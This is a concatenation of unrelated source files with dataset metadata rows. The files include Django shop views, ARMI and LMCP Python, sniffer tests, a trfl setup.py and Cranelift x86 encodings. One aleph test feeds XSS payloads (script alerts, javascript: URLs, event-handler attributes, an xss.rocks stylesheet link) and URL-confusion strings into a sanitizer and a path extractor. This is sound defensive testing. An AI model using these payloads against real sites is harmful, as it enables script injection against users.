return render(request, 'buildingsupply/product_edit.html', {'form': form})
@staff_member_required
def category_list_emp(request):
categories = Category.objects.all()
return render(request, 'buildingsupply/categories_list.html',
{'categories': categories})
@staff_member_required
def category_new(request):
if request.method == "POST":
form = CategoryForm(request.POST)
if form.is_valid():
category = form.save(commit=False)
category.save()
return redirect('products:category_list')
else:
form = CategoryForm()
return render(request, 'buildingsupply/category_new.html', {'form': form})
@staff_member_required
def category_edit(request, pk):
category = get_object_or_404(Category, pk=pk)
if request.method == "POST":
form = CategoryForm(request.POST, instance=category)
if form.is_valid():
category = form.save()
category.save()
return redirect('products:category_list')
else:
form = CategoryForm(instance=category)
return render(request, 'buildingsupply/category_edit.html', {'form': form,
'pk': pk})
@staff_member_required
def employee_home(request):
categoryCount = str(Category.objects.all().count())
productsCount = str(Product.objects.all().count())
customerCount = str(Customer.objects.all().count())
orderCount = str(Order.objects.all().count())
context = {"categoryCount": categoryCount,
"productsCount": productsCount,
"customerCount": customerCount,
"orderCount": orderCount}
return render(request, 'buildingsupply/employee_home.html', {'context': context})
def category_list(request):
categories = Category.objects.all()
context = {
"categories": categories,
}
return context
@staff_member_required
def category_delete(request, pk):
category = get_object_or_404(Category, pk=pk)
if request.method == "POST":
category.delete()
return redirect('products:category_list_emp')
return render(request, 'buildingsupply/category_delete.html', {'category': category})
@staff_member_required
def product_delete(request, pk):
product = get_object_or_404(Product, pk=pk)
if request.method == "POST":
product.delete()
return redirect('products:product_list')
return render(request, 'buildingsupply/product_delete.html', {'product': product})
def RFQ(request):
form = RFQForm(request.POST, request.FILES)
if form.is_valid():
form.save()
return render(request, 'buildingsupply/request_done.html')
else:
form = RFQForm()
return render(request, 'buildingsupply/RFQ.html', {'form': form})
| 31.813953 | 89 | 0.64693 |
2fe4b6ce52dc3889955b82d99b7a0a407ef5fd32 | 765 | py | Python | doc/gallery-src/framework/run_isotxs2_matrix.py | ZanderUF/armi | c55ebe4d77821d3357ddd3326478ffaf44962c89 | [
"Apache-2.0"
] | 1 | 2022-01-23T06:09:50.000Z | 2022-01-23T06:09:50.000Z | doc/gallery-src/framework/run_isotxs2_matrix.py | ZanderUF/armi | c55ebe4d77821d3357ddd3326478ffaf44962c89 | [
"Apache-2.0"
] | null | null | null | doc/gallery-src/framework/run_isotxs2_matrix.py | ZanderUF/armi | c55ebe4d77821d3357ddd3326478ffaf44962c89 | [
"Apache-2.0"
] | 1 | 2020-08-26T09:02:06.000Z | 2020-08-26T09:02:06.000Z | """
Plotting a multi-group scatter matrix
=====================================
Here we plot scatter matrices from an ISOTXS microscopic cross section library.
We plot the inelastic scatter cross section of U235 as well as the (n,2n) source
matrix.
See Also: :py:mod:`ISOTXS <armi.nuclearDataIO.isotxs>` format.
"""
import matplotlib.pyplot as plt
from armi.utils import units
from armi.tests import ISOAA_PATH
from armi.nuclearDataIO import isotxs
from armi.nuclearDataIO import xsNuclides
import armi
armi.configure()
lib = isotxs.readBinary(ISOAA_PATH)
u235 = lib.getNuclide("U235", "AA")
xsNuclides.plotScatterMatrix(u235.micros.inelasticScatter, "U-235 inelastic")
plt.figure()
xsNuclides.plotScatterMatrix(u235.micros.n2nScatter, "U-235 n,2n src")
| 24.677419 | 80 | 0.747712 |
508585309fe1e22ce027e5d9067f2eb7247ed665 | 2,036 | py | Python | aleph/tests/test_view_util.py | Rosencrantz/aleph | 47ac45fa72607e1ab16c7c30690013a7d00be116 | [
"MIT"
] | 1,213 | 2017-03-15T08:10:52.000Z | 2022-03-29T13:57:44.000Z | aleph/tests/test_view_util.py | Rosencrantz/aleph | 47ac45fa72607e1ab16c7c30690013a7d00be116 | [
"MIT"
] | 1,374 | 2017-03-14T18:23:10.000Z | 2022-03-31T18:42:20.000Z | aleph/tests/test_view_util.py | Rosencrantz/aleph | 47ac45fa72607e1ab16c7c30690013a7d00be116 | [
"MIT"
] | 217 | 2017-03-17T12:04:22.000Z | 2022-03-20T11:17:16.000Z | from lxml.html import document_fromstring
from aleph.logic.html import sanitize_html
from aleph.views.util import get_url_path
from aleph.tests.util import TestCase
class ViewUtilTest(TestCase):
def setUp(self):
super(ViewUtilTest, self).setUp()
def test_get_url_pat(self):
self.assertEqual("/", get_url_path(""))
self.assertEqual("/next", get_url_path("/next"))
self.assertEqual("/next", get_url_path("https://aleph.ui:3000/next"))
url = get_url_path("https://example.com\\@aleph.ui/oauth?path=%%2F")
self.assertEqual("/oauth?path=%%2F", url)
self.assertEqual("/%%2F", get_url_path("https://example.com\\@aleph.ui/%%2F"))
def test_sanitize_html(self):
html_str = '<!doctype html><html><head><title>Article</title><style type="text/css">body { }</style><script>alert("We love Angular")</script><link rel="stylesheet" href="http://xss.rocks/xss.css"></head><body><article id="story"><h1>We welcome our new React overlords</h1><img src=" javascript:alert(\'XSS\');" alt="" /><p>Published on <time onmouseover="alert(\'XSS\')">1 January 2018</time></p><p>Really the only thing better than the <a href="/blockchain">blockchain</a> is ReactJS.</p></article><video> <source onerror = "javascript: alert (XSS)"></video></body></html>' # noqa
processed = sanitize_html(html_str, "https://example.org/welcome-react")
html = document_fromstring(processed)
assert html.find(".//img") is None, html
assert html.find(".//video") is None, html
assert html.find(".//style") is None, html
assert html.find(".//script") is None, html
assert len(html.findall(".//article")) == 1, html
attr = html.find(".//time").get("onmouseover")
assert attr is None, html
attr = html.find(".//a").get("href")
assert attr == "https://example.org/blockchain", html
assert html.find(".//a").get("target") == "_blank", html
assert "nofollow" in html.find(".//a").get("rel"), html
| 58.171429 | 596 | 0.644401 |
0f49c2ca12b45c7d573c187e9cd7c1eb781d9664 | 1,794 | py | Python | tests/json_tests.py | Caflo/sniffy | 35da1aa5c6de6ce1cb64d66125ff8dabdd03a928 | [
"MIT"
] | null | null | null | tests/json_tests.py | Caflo/sniffy | 35da1aa5c6de6ce1cb64d66125ff8dabdd03a928 | [
"MIT"
] | null | null | null | tests/json_tests.py | Caflo/sniffy | 35da1aa5c6de6ce1cb64d66125ff8dabdd03a928 | [
"MIT"
] | null | null | null | import os
import logging
import unittest
import subprocess
from src.log.log import logger
from unittest import TestCase
from src.controller.sniffer_ctrl import RequestHandler
class TestJson(TestCase):
def setUp(self) -> None:
print("\n\n----------------- SETUP -----------------")
print("Getting shared logger")
self.logger = logging.getLogger("sniffy.json_tests")
logger.info("Cleaning up...")
subprocess.call(['tests\\restore_resources.bat']) # TODO do a better cross-platform way to restore files
def test_01_read_sniffers(self):
print("\n\n----------------- TEST 01: GET ALL SNIFFERS / GET ACTIVE SNIFFERS -----------------")
self.cf = RequestHandler(config_path='tests/resources', config_filename='sniffers_01.json')
self.cf.get_all_sniffers()
self.cf.get_active_sniffers()
def test_02_add_sniffer(self):
print("\n\n----------------- TEST 02: ADD SNIFFER -----------------")
self.cf = RequestHandler(config_path='tests/resources', config_filename='sniffers_02.json')
self.cf.add_sniffer("iface-test-4")
self.cf.get_all_sniffers()
def test_03_remove_sniffer(self):
print("\n\n----------------- TEST 03: REMOVE SNIFFER -----------------")
self.cf = RequestHandler(config_path='tests/resources', config_filename='sniffers_03.json')
self.cf.get_all_sniffers()
self.cf.remove_sniffer(2)
def test_04_clear_all_sniffers(self):
print("\n\n----------------- TEST 03: CLEAR ALL SNIFFERS -----------------")
self.cf = RequestHandler(config_path='tests/resources', config_filename='sniffers_04.json')
self.cf.clear_all_sniffers()
self.cf.get_all_sniffers()
if __name__ == '__main__':
unittest.main() | 39 | 112 | 0.624861 |
4b327c10835063ec43b0fedd0c7335d15ca2ac05 | 7,157 | py | Python | examples/CooperativeSearch/psaltlib/LMCP/py/afrl/impact/AngledAreaSearchTask.py | GaloisInc/salty | f410659b3399ad7c527513e67b06dff0332d823e | [
"BSD-3-Clause"
] | 13 | 2017-02-15T21:56:46.000Z | 2022-03-23T12:59:26.000Z | examples/VIP-Escort/lmcp/py/afrl/impact/AngledAreaSearchTask.py | GaloisInc/salty | f410659b3399ad7c527513e67b06dff0332d823e | [
"BSD-3-Clause"
] | 17 | 2016-07-21T10:47:23.000Z | 2020-08-07T13:26:21.000Z | examples/CooperativeSearch/psaltlib/LMCP/py/afrl/impact/AngledAreaSearchTask.py | GaloisInc/salty | f410659b3399ad7c527513e67b06dff0332d823e | [
"BSD-3-Clause"
] | 2 | 2019-06-11T11:59:40.000Z | 2022-02-09T12:48:39.000Z | #! /usr/bin/python
import sys, struct
import xml.dom.minidom
from lmcp import LMCPObject
## ===============================================================================
## Authors: AFRL/RQQA
## Organization: Air Force Research Laboratory, Aerospace Systems Directorate, Power and Control Division
##
## Copyright (c) 2017 Government of the United State of America, as represented by
## the Secretary of the Air Force. No copyright is claimed in the United States under
## Title 17, U.S. Code. All Other Rights Reserved.
## ===============================================================================
## This file was auto-created by LmcpGen. Modifications will be overwritten.
from afrl.cmasi import SearchTask
from afrl.cmasi import Location3D
class AngledAreaSearchTask(SearchTask.SearchTask):
def __init__(self):
SearchTask.SearchTask.__init__(self)
self.LMCP_TYPE = 27
self.SERIES_NAME = "IMPACT"
self.FULL_LMCP_TYPE_NAME = "afrl.impact.AngledAreaSearchTask"
#Series Name turned into a long for quick comparisons.
self.SERIES_NAME_ID = 5281966179208134656
self.SERIES_VERSION = 13
#Define message fields
self.SearchAreaID = 0 #int64
self.SweepAngle = 0 #real32
self.StartPoint = None #Location3D
def pack(self):
"""
Packs the object data and returns a string that contains all of the serialized
members.
"""
buffer = bytearray()
buffer.extend(SearchTask.SearchTask.pack(self))
buffer.extend(struct.pack(">q", self.SearchAreaID))
buffer.extend(struct.pack(">f", self.SweepAngle))
buffer.extend(struct.pack("B", self.StartPoint != None ))
if self.StartPoint != None:
buffer.extend(struct.pack(">q", self.StartPoint.SERIES_NAME_ID))
buffer.extend(struct.pack(">I", self.StartPoint.LMCP_TYPE))
buffer.extend(struct.pack(">H", self.StartPoint.SERIES_VERSION))
buffer.extend(self.StartPoint.pack())
return buffer
def unpack(self, buffer, _pos):
"""
Unpacks data from a bytearray and sets class members
"""
_pos = SearchTask.SearchTask.unpack(self, buffer, _pos)
self.SearchAreaID = struct.unpack_from(">q", buffer, _pos)[0]
_pos += 8
self.SweepAngle = struct.unpack_from(">f", buffer, _pos)[0]
_pos += 4
_valid = struct.unpack_from("B", buffer, _pos )[0]
_pos += 1
if _valid:
_series = struct.unpack_from(">q", buffer, _pos)[0]
_pos += 8
_type = struct.unpack_from(">I", buffer, _pos)[0]
_pos += 4
_version = struct.unpack_from(">H", buffer, _pos)[0]
_pos += 2
from lmcp import LMCPFactory
self.StartPoint = LMCPFactory.LMCPFactory().createObject(_series, _version, _type )
_pos = self.StartPoint.unpack(buffer, _pos)
else:
self.StartPoint = None
return _pos
def unpackFromXMLNode(self, el, seriesFactory):
SearchTask.SearchTask.unpackFromXMLNode(self, el, seriesFactory)
for e in el.childNodes:
if e.nodeType == xml.dom.Node.ELEMENT_NODE:
if e.localName == "SearchAreaID" and len(e.childNodes) > 0 :
self.SearchAreaID = int(e.childNodes[0].nodeValue)
elif e.localName == "SweepAngle" and len(e.childNodes) > 0 :
self.SweepAngle = float(e.childNodes[0].nodeValue)
elif e.localName == "StartPoint" and len(e.childNodes) > 0 :
for n in e.childNodes:
if n.nodeType == xml.dom.Node.ELEMENT_NODE:
self.StartPoint = seriesFactory.createObjectByName(n.getAttribute('Series'), n.localName)
if self.StartPoint != None:
self.StartPoint.unpackFromXMLNode(n, seriesFactory)
return
def unpackFromDict(self, d, seriesFactory):
SearchTask.SearchTask.unpackFromDict(self, d, seriesFactory)
for key in d:
if key == "SearchAreaID":
self.SearchAreaID = d[key]
elif key == "SweepAngle":
self.SweepAngle = d[key]
elif key == "StartPoint":
self.StartPoint = seriesFactory.unpackFromDict(d[key])
return
def get_SearchAreaID(self):
return self.SearchAreaID
def set_SearchAreaID(self, value):
self.SearchAreaID = int( value )
def get_SweepAngle(self):
return self.SweepAngle
def set_SweepAngle(self, value):
self.SweepAngle = float( value )
def get_StartPoint(self):
return self.StartPoint
def set_StartPoint(self, value):
self.StartPoint = value
def toString(self):
"""
Returns a string representation of all variables
"""
buf = SearchTask.SearchTask.toString(self)
buf += "From AngledAreaSearchTask:\n"
buf += "SearchAreaID = " + str( self.SearchAreaID ) + "\n"
buf += "SweepAngle = " + str( self.SweepAngle ) + "\n"
buf += "StartPoint = " + str( self.StartPoint ) + "\n"
return buf;
def toDict(self):
m = {}
self.toDictMembers(m)
d = {}
if ("IMPACT" is None) or ("IMPACT" is ""): # this should never happen
# need to fill this with error message
d["datatype"] = str("DEBUG_PROBLEM_HERE" + "/AngledAreaSearchTask")
d["datastring"] = str(m)
else:
d['datatype'] = str("IMPACT" + "/AngledAreaSearchTask")
d['datastring'] = str(m)
return d
def toDictMembers(self, d):
SearchTask.SearchTask.toDictMembers(self, d)
d['SearchAreaID'] = self.SearchAreaID
d['SweepAngle'] = self.SweepAngle
if self.StartPoint == None:
d['StartPoint'] = None
else:
d['StartPoint'] = self.StartPoint.toDict()
return
def getLMCPType(self):
return self.LMCP_TYPE
def getSeriesName(self):
return self.SERIES_NAME
def getSeriesNameID(self):
return self.SERIES_NAME_ID
def getSeriesVersion(self):
return self.SERIES_VERSION
def toXMLStr(self, ws):
str = ws + '<AngledAreaSearchTask Series="IMPACT" >\n';
#str +=SearchTask.SearchTask.toXMLMembersStr(self, ws + " ")
str += self.toXMLMembersStr(ws + " ")
str += ws + "</AngledAreaSearchTask>\n";
return str
def toXMLMembersStr(self, ws):
buf = ""
buf += SearchTask.SearchTask.toXMLMembersStr(self, ws)
buf += ws + "<SearchAreaID>" + str(self.SearchAreaID) + "</SearchAreaID>\n"
buf += ws + "<SweepAngle>" + str(self.SweepAngle) + "</SweepAngle>\n"
buf += ws + "<StartPoint>\n"
if self.StartPoint == None:
buf += ws + " <null/>\n"
else:
buf += ws + self.StartPoint.toXMLStr(ws + " ")
buf += ws + "</StartPoint>\n"
return buf
| 35.606965 | 117 | 0.578175 |
43baa4e61c524ffe1ef7e3086ac851b30eb6e771 | 2,989 | py | Python | setup.py | hartikainen/trfl | e633edbd9d326b8bebc7c7c7d53f37118b48a440 | [
"Apache-2.0"
] | null | null | null | setup.py | hartikainen/trfl | e633edbd9d326b8bebc7c7c7d53f37118b48a440 | [
"Apache-2.0"
] | null | null | null | setup.py | hartikainen/trfl | e633edbd9d326b8bebc7c7c7d53f37118b48a440 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 The trfl Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Setup for pip package."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import unittest
from setuptools import find_packages
from setuptools import setup
from setuptools.dist import Distribution
REQUIRED_PACKAGES = ['six', 'absl-py', 'numpy', 'wrapt', 'dm-tree']
EXTRA_PACKAGES = {
'tensorflow': [
'tensorflow>=1.15,<1.16', 'tensorflow-probability>=0.8,<0.9'
],
'tensorflow with gpu': [
'tensorflow-gpu>=1.15,<1.16', 'tensorflow-probability>=0.8,<0.9'
],
}
def trfl_test_suite():
test_loader = unittest.TestLoader()
test_suite = test_loader.discover('trfl', pattern='*_test.py')
return test_suite
class BinaryDistribution(Distribution):
"""This class is needed in order to create OS specific wheels."""
def has_ext_modules(self):
return True
setup(
name='trfl',
version='1.0.2',
description=('trfl is a library of building blocks for '
'reinforcement learning algorithms.'),
long_description='',
url='http://www.github.com/deepmind/trfl/',
author='DeepMind',
author_email='trfl-steering@google.com',
# Contained modules and scripts.
packages=find_packages(),
install_requires=REQUIRED_PACKAGES,
extras_require=EXTRA_PACKAGES,
# Add in any packaged data.
include_package_data=True,
zip_safe=False,
distclass=BinaryDistribution,
# PyPI package information.
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Education',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: Apache Software License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: POSIX',
'Operating System :: Unix',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
'Topic :: Software Development :: Libraries',
],
license='Apache 2.0',
keywords='trfl truffle tensorflow tensor machine reinforcement learning',
test_suite='setup.trfl_test_suite',
)
| 33.965909 | 78 | 0.668451 |
264a7b656c8231bb102da5df21535c0966dbb1a9 | 416 | py | Python | setup.py | wuyang0928/testrepo2 | e31c6b4aa701e162886c99f6db4b2928c26c99fe | [
"MIT"
] | null | null | null | setup.py | wuyang0928/testrepo2 | e31c6b4aa701e162886c99f6db4b2928c26c99fe | [
"MIT"
] | 1 | 2017-12-01T04:58:29.000Z | 2017-12-01T04:58:29.000Z | setup.py | wuyang0928/testrepo2 | e31c6b4aa701e162886c99f6db4b2928c26c99fe | [
"MIT"
] | 63 | 2017-11-27T06:46:37.000Z | 2020-10-14T14:23:29.000Z | from setuptools import setup, find_packages
setup(name='WorkshopExample',
version='0.0.1',
description='Random example project for coding workshop',
url='http://github.com/Samreay/WorkshopExample',
author='Samuel Hinton',
author_email='samuelreay@gmail.com',
license='MIT',
install_requires=['numpy'],
packages=find_packages(exclude=('tests', 'doc', 'data'))
)
| 32 | 63 | 0.665865 |
d325dfe870886610f6405862e47b2904b64c917a | 369 | py | Python | 1.py | juandarr/ProjectEuler | 951705ac62f550d7fbecdc3f35ab8c38b53b9225 | [
"MIT"
] | null | null | null | 1.py | juandarr/ProjectEuler | 951705ac62f550d7fbecdc3f35ab8c38b53b9225 | [
"MIT"
] | null | null | null | 1.py | juandarr/ProjectEuler | 951705ac62f550d7fbecdc3f35ab8c38b53b9225 | [
"MIT"
] | null | null | null | """
Adds the multiples of 3 or 5 below a certain number
Author: Juan Rios
"""
def multiple_of_3_or_5(number):
sum = 0
for i in range(1,number):
if (i%3==0 or i%5==0):
sum += i
return sum
if __name__ == "__main__":
number = 1000
print('The sum of multiples of 3 or 5 below {0} is {1}'.format(number, multiple_of_3_or_5(number))) | 24.6 | 103 | 0.617886 |
8b5f9cf0bc04565ea1d03c8d51c47f29c9b8b54c | 27,138 | py | Python | cranelift-codegen/meta-python/isa/x86/encodings.py | benschau/cranelift | be02e945613270d17a316a23a58e0791d5712cee | [
"Apache-2.0"
] | null | null | null | cranelift-codegen/meta-python/isa/x86/encodings.py | benschau/cranelift | be02e945613270d17a316a23a58e0791d5712cee | [
"Apache-2.0"
] | null | null | null | cranelift-codegen/meta-python/isa/x86/encodings.py | benschau/cranelift | be02e945613270d17a316a23a58e0791d5712cee | [
"Apache-2.0"
] | null | null | null | """
x86 Encodings.
"""
from __future__ import absolute_import
from cdsl.predicates import IsZero32BitFloat, IsZero64BitFloat
from cdsl.predicates import IsUnsignedInt
from base.predicates import IsColocatedFunc, IsColocatedData, LengthEquals
from base import instructions as base
from base import types
from base.formats import UnaryIeee32, UnaryIeee64, UnaryImm
from base.formats import FuncAddr, Call, LoadComplex, StoreComplex
from .defs import X86_64, X86_32
from . import recipes as r
from . import settings as cfg
from . import instructions as x86
from .legalize import x86_expand
from base.legalize import narrow, widen, expand_flags
from .settings import use_sse41, not_all_ones_funcaddrs_and_not_is_pic, \
all_ones_funcaddrs_and_not_is_pic, is_pic, not_is_pic
try:
from typing import TYPE_CHECKING, Any # noqa
if TYPE_CHECKING:
from cdsl.instructions import MaybeBoundInst # noqa
from cdsl.predicates import FieldPredicate # noqa
except ImportError:
pass
X86_32.legalize_monomorphic(expand_flags)
X86_32.legalize_type(
default=narrow,
b1=expand_flags,
i8=widen,
i16=widen,
i32=x86_expand,
f32=x86_expand,
f64=x86_expand)
X86_64.legalize_monomorphic(expand_flags)
X86_64.legalize_type(
default=narrow,
b1=expand_flags,
i8=widen,
i16=widen,
i32=x86_expand,
i64=x86_expand,
f32=x86_expand,
f64=x86_expand)
#
# Helper functions for generating encodings.
#
def enc_x86_64(inst, recipe, *args, **kwargs):
# type: (MaybeBoundInst, r.TailRecipe, *int, **int) -> None
"""
Add encodings for `inst` to X86_64 with and without a REX prefix.
"""
X86_64.enc(inst, *recipe.rex(*args, **kwargs))
X86_64.enc(inst, *recipe(*args, **kwargs))
def enc_x86_64_instp(inst, recipe, instp, *args, **kwargs):
# type: (MaybeBoundInst, r.TailRecipe, FieldPredicate, *int, **int) -> None
"""
Add encodings for `inst` to X86_64 with and without a REX prefix.
"""
X86_64.enc(inst, *recipe.rex(*args, **kwargs), instp=instp)
X86_64.enc(inst, *recipe(*args, **kwargs), instp=instp)
def enc_both(inst, recipe, *args, **kwargs):
# type: (MaybeBoundInst, r.TailRecipe, *int, **Any) -> None
"""
Add encodings for `inst` to both X86_32 and X86_64.
"""
X86_32.enc(inst, *recipe(*args, **kwargs))
enc_x86_64(inst, recipe, *args, **kwargs)
def enc_both_instp(inst, recipe, instp, *args, **kwargs):
# type: (MaybeBoundInst, r.TailRecipe, FieldPredicate, *int, **Any) -> None
"""
Add encodings for `inst` to both X86_32 and X86_64.
"""
X86_32.enc(inst, *recipe(*args, **kwargs), instp=instp)
enc_x86_64_instp(inst, recipe, instp, *args, **kwargs)
def enc_i32_i64(inst, recipe, *args, **kwargs):
# type: (MaybeBoundInst, r.TailRecipe, *int, **int) -> None
"""
Add encodings for `inst.i32` to X86_32.
Add encodings for `inst.i32` to X86_64 with and without REX.
Add encodings for `inst.i64` to X86_64 with a REX.W prefix.
"""
X86_32.enc(inst.i32, *recipe(*args, **kwargs))
# REX-less encoding must come after REX encoding so we don't use it by
# default. Otherwise reg-alloc would never use r8 and up.
X86_64.enc(inst.i32, *recipe.rex(*args, **kwargs))
X86_64.enc(inst.i32, *recipe(*args, **kwargs))
X86_64.enc(inst.i64, *recipe.rex(*args, w=1, **kwargs))
def enc_i32_i64_instp(inst, recipe, instp, *args, **kwargs):
# type: (MaybeBoundInst, r.TailRecipe, FieldPredicate, *int, **int) -> None
"""
Add encodings for `inst.i32` to X86_32.
Add encodings for `inst.i32` to X86_64 with and without REX.
Add encodings for `inst.i64` to X86_64 with a REX.W prefix.
Similar to `enc_i32_i64` but applies `instp` to each encoding.
"""
X86_32.enc(inst.i32, *recipe(*args, **kwargs), instp=instp)
# REX-less encoding must come after REX encoding so we don't use it by
# default. Otherwise reg-alloc would never use r8 and up.
X86_64.enc(inst.i32, *recipe.rex(*args, **kwargs), instp=instp)
X86_64.enc(inst.i32, *recipe(*args, **kwargs), instp=instp)
X86_64.enc(inst.i64, *recipe.rex(*args, w=1, **kwargs), instp=instp)
def enc_i32_i64_ld_st(inst, w_bit, recipe, *args, **kwargs):
# type: (MaybeBoundInst, bool, r.TailRecipe, *int, **int) -> None
"""
Add encodings for `inst.i32` to X86_32.
Add encodings for `inst.i32` to X86_64 with and without REX.
Add encodings for `inst.i64` to X86_64 with a REX prefix, using the `w_bit`
argument to determine whether or not to set the REX.W bit.
"""
X86_32.enc(inst.i32.any, *recipe(*args, **kwargs))
# REX-less encoding must come after REX encoding so we don't use it by
# default. Otherwise reg-alloc would never use r8 and up.
X86_64.enc(inst.i32.any, *recipe.rex(*args, **kwargs))
X86_64.enc(inst.i32.any, *recipe(*args, **kwargs))
if w_bit:
X86_64.enc(inst.i64.any, *recipe.rex(*args, w=1, **kwargs))
else:
X86_64.enc(inst.i64.any, *recipe.rex(*args, **kwargs))
X86_64.enc(inst.i64.any, *recipe(*args, **kwargs))
for inst, opc in [
(base.iadd, 0x01),
(base.isub, 0x29),
(base.band, 0x21),
(base.bor, 0x09),
(base.bxor, 0x31)]:
enc_i32_i64(inst, r.rr, opc)
# x86 has a bitwise not instruction NOT.
enc_i32_i64(base.bnot, r.ur, 0xf7, rrr=2)
# Also add a `b1` encodings for the logic instructions.
# TODO: Should this be done with 8-bit instructions? It would improve
# partial register dependencies.
enc_both(base.band.b1, r.rr, 0x21)
enc_both(base.bor.b1, r.rr, 0x09)
enc_both(base.bxor.b1, r.rr, 0x31)
enc_i32_i64(base.imul, r.rrx, 0x0f, 0xaf)
enc_i32_i64(x86.sdivmodx, r.div, 0xf7, rrr=7)
enc_i32_i64(x86.udivmodx, r.div, 0xf7, rrr=6)
enc_i32_i64(x86.smulx, r.mulx, 0xf7, rrr=5)
enc_i32_i64(x86.umulx, r.mulx, 0xf7, rrr=4)
enc_i32_i64(base.copy, r.umr, 0x89)
for ty in [types.b1, types.i8, types.i16]:
enc_both(base.copy.bind(ty), r.umr, 0x89)
# For x86-64, only define REX forms for now, since we can't describe the
# special regunit immediate operands with the current constraint language.
for ty in [types.i8, types.i16, types.i32]:
X86_32.enc(base.regmove.bind(ty), *r.rmov(0x89))
X86_64.enc(base.regmove.bind(ty), *r.rmov.rex(0x89))
X86_64.enc(base.regmove.i64, *r.rmov.rex(0x89, w=1))
enc_both(base.regmove.b1, r.rmov, 0x89)
enc_both(base.regmove.i8, r.rmov, 0x89)
# Immediate instructions with sign-extended 8-bit and 32-bit immediate.
for inst, rrr in [
(base.iadd_imm, 0),
(base.band_imm, 4),
(base.bor_imm, 1),
(base.bxor_imm, 6)]:
enc_i32_i64(inst, r.r_ib, 0x83, rrr=rrr)
enc_i32_i64(inst, r.r_id, 0x81, rrr=rrr)
# TODO: band_imm.i64 with an unsigned 32-bit immediate can be encoded as
# band_imm.i32. Can even use the single-byte immediate for 0xffff_ffXX masks.
# Immediate constants.
X86_32.enc(base.iconst.i32, *r.pu_id(0xb8))
X86_64.enc(base.iconst.i32, *r.pu_id.rex(0xb8))
X86_64.enc(base.iconst.i32, *r.pu_id(0xb8))
# The 32-bit immediate movl also zero-extends to 64 bits.
X86_64.enc(base.iconst.i64, *r.pu_id.rex(0xb8),
instp=IsUnsignedInt(UnaryImm.imm, 32))
X86_64.enc(base.iconst.i64, *r.pu_id(0xb8),
instp=IsUnsignedInt(UnaryImm.imm, 32))
# Sign-extended 32-bit immediate.
X86_64.enc(base.iconst.i64, *r.u_id.rex(0xc7, rrr=0, w=1))
# Finally, the 0xb8 opcode takes an 8-byte immediate with a REX.W prefix.
X86_64.enc(base.iconst.i64, *r.pu_iq.rex(0xb8, w=1))
# bool constants.
enc_both(base.bconst.b1, r.pu_id_bool, 0xb8)
# Shifts and rotates.
# Note that the dynamic shift amount is only masked by 5 or 6 bits; the 8-bit
# and 16-bit shifts would need explicit masking.
for inst, rrr in [
(base.rotl, 0),
(base.rotr, 1),
(base.ishl, 4),
(base.ushr, 5),
(base.sshr, 7)]:
# Cannot use enc_i32_i64 for this pattern because instructions require
# .any suffix.
X86_32.enc(inst.i32.any, *r.rc(0xd3, rrr=rrr))
X86_64.enc(inst.i64.any, *r.rc.rex(0xd3, rrr=rrr, w=1))
X86_64.enc(inst.i32.any, *r.rc.rex(0xd3, rrr=rrr))
X86_64.enc(inst.i32.any, *r.rc(0xd3, rrr=rrr))
for inst, rrr in [
(base.rotl_imm, 0),
(base.rotr_imm, 1),
(base.ishl_imm, 4),
(base.ushr_imm, 5),
(base.sshr_imm, 7)]:
enc_i32_i64(inst, r.r_ib, 0xc1, rrr=rrr)
# Population count.
X86_32.enc(base.popcnt.i32, *r.urm(0xf3, 0x0f, 0xb8), isap=cfg.use_popcnt)
X86_64.enc(base.popcnt.i64, *r.urm.rex(0xf3, 0x0f, 0xb8, w=1),
isap=cfg.use_popcnt)
X86_64.enc(base.popcnt.i32, *r.urm.rex(0xf3, 0x0f, 0xb8), isap=cfg.use_popcnt)
X86_64.enc(base.popcnt.i32, *r.urm(0xf3, 0x0f, 0xb8), isap=cfg.use_popcnt)
# Count leading zero bits.
X86_32.enc(base.clz.i32, *r.urm(0xf3, 0x0f, 0xbd), isap=cfg.use_lzcnt)
X86_64.enc(base.clz.i64, *r.urm.rex(0xf3, 0x0f, 0xbd, w=1),
isap=cfg.use_lzcnt)
X86_64.enc(base.clz.i32, *r.urm.rex(0xf3, 0x0f, 0xbd), isap=cfg.use_lzcnt)
X86_64.enc(base.clz.i32, *r.urm(0xf3, 0x0f, 0xbd), isap=cfg.use_lzcnt)
# Count trailing zero bits.
X86_32.enc(base.ctz.i32, *r.urm(0xf3, 0x0f, 0xbc), isap=cfg.use_bmi1)
X86_64.enc(base.ctz.i64, *r.urm.rex(0xf3, 0x0f, 0xbc, w=1),
isap=cfg.use_bmi1)
X86_64.enc(base.ctz.i32, *r.urm.rex(0xf3, 0x0f, 0xbc), isap=cfg.use_bmi1)
X86_64.enc(base.ctz.i32, *r.urm(0xf3, 0x0f, 0xbc), isap=cfg.use_bmi1)
#
# Loads and stores.
#
ldcomplexp = LengthEquals(LoadComplex, 2)
for recipe in [r.ldWithIndex, r.ldWithIndexDisp8, r.ldWithIndexDisp32]:
enc_i32_i64_instp(base.load_complex, recipe, ldcomplexp, 0x8b)
enc_x86_64_instp(base.uload32_complex, recipe, ldcomplexp, 0x8b)
X86_64.enc(base.sload32_complex, *recipe.rex(0x63, w=1),
instp=ldcomplexp)
enc_i32_i64_instp(base.uload16_complex, recipe, ldcomplexp, 0x0f, 0xb7)
enc_i32_i64_instp(base.sload16_complex, recipe, ldcomplexp, 0x0f, 0xbf)
enc_i32_i64_instp(base.uload8_complex, recipe, ldcomplexp, 0x0f, 0xb6)
enc_i32_i64_instp(base.sload8_complex, recipe, ldcomplexp, 0x0f, 0xbe)
stcomplexp = LengthEquals(StoreComplex, 3)
for recipe in [r.stWithIndex, r.stWithIndexDisp8, r.stWithIndexDisp32]:
enc_i32_i64_instp(base.store_complex, recipe, stcomplexp, 0x89)
